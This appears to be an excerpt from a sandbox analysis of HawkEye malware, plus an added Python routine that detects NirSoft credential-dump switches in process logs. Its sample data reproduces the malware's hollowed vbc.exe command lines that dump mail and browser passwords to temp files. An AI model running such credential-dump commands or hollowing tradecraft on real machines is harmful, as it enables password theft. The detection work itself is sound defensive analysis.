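The two vbc.exe entries above are the sample's credential-theft step: HawkEye hollows the .NET Framework compiler (note the 0x400000 image base and the MailPassView / WebBrowserPassView Yara hits in that memory region) and drives the embedded NirSoft tools with their /stext save switch, dumping recovered mail and browser credentials to holdermail.txt and holderwb.txt under %TEMP%. The following detection routine is an added example written for this page, not code from the report or from Joe Security. It scans constructed process-creation records in a simple pid|image|commandline layout (the first two mirror the command lines shown above; the others are controls), flags any command line carrying a NirSoft save switch, and rates the hit "high" when the host image is a compiler that never legitimately takes such a switch. The host list beyond vbc.exe and the sample pids are assumptions, not taken from the report.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# NirSoft password-recovery tools write their results via "save" switches.
# The report shows /stext; the remaining names are the tools' other output
# formats.  The lookbehind keeps a switch from matching inside a path.
_SAVE_SWITCH_RE = re.compile(
    r"""(?i)(?<!\S)(?P<switch>/s(?:text|tabular|tab|comma|html|verhtml|xml))\s+
        (?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<bare>\S+))""",
    re.VERBOSE,
)

# vbc.exe is the host hollowed in this report.  The other three are assumed
# (other .NET Framework utilities commonly abused the same way), not from the page.
HOLLOWED_HOSTS = {"vbc.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}


@dataclass
class Finding:
    pid: int
    image: str
    switch: str
    output_path: str   # where the dumped credentials land; collect it during IR
    severity: str


def parse_event(line: str) -> Tuple[int, str, str]:
    """Split one 'pid|image|commandline' record (constructed layout for this example)."""
    pid, image, cmdline = line.split("|", 2)
    return int(pid), image, cmdline


def scan_events(text: str) -> List[Finding]:
    """Return a Finding for every process whose command line uses a NirSoft save switch."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        pid, image, cmdline = parse_event(raw)
        m = _SAVE_SWITCH_RE.search(cmdline)
        if not m:
            continue
        out = m.group("dq") or m.group("sq") or m.group("bare")
        host = image.rsplit("\\", 1)[-1].lower()
        # A compiler invoking a password-recovery switch means the image was
        # replaced in memory (process hollowing), so rate it above a plain
        # NirSoft binary run under its own name.
        severity = "high" if host in HOLLOWED_HOSTS else "medium"
        findings.append(Finding(pid, image, m.group("switch").lower(), out, severity))
    return findings


# Constructed records.  The first two reproduce the vbc.exe command lines from the
# report (the single quotes are how the report renders them; real logs use double
# quotes, which the regex also accepts).  Pids are made up.
SAMPLE_EVENTS = r"""
4100|C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe|C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
4104|C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe|C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
4200|C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe|vbc.exe /nologo /out:"C:\build\app.exe" C:\build\Program.vb
4300|C:\Windows\SysWOW64\WerFault.exe|C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
4500|C:\Users\user\Downloads\mailpv.exe|mailpv.exe /stext "C:\Users\user\out.txt"
"""

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} {f.image} {f.switch} -> {f.output_path}")
```

The legitimate compile (pid 4200) and the WerFault crash handler (pid 4300) produce nothing; the two hollowed vbc.exe processes are rated high and the output paths give a responder the files to pull before the sample exfiltrates them. In a real deployment the same match would run over Sysmon event 1 or Windows 4688 command lines, and a second check that the process image on disk is a Microsoft-signed compiler while its memory holds an unsigned PE at 0x400000 would confirm the hollowing the report's Yara matches indicate.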

                                                                      General

                                                                      Start time:15:03:40
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET

                                                                      Disassembly

                                                                      Code Analysis
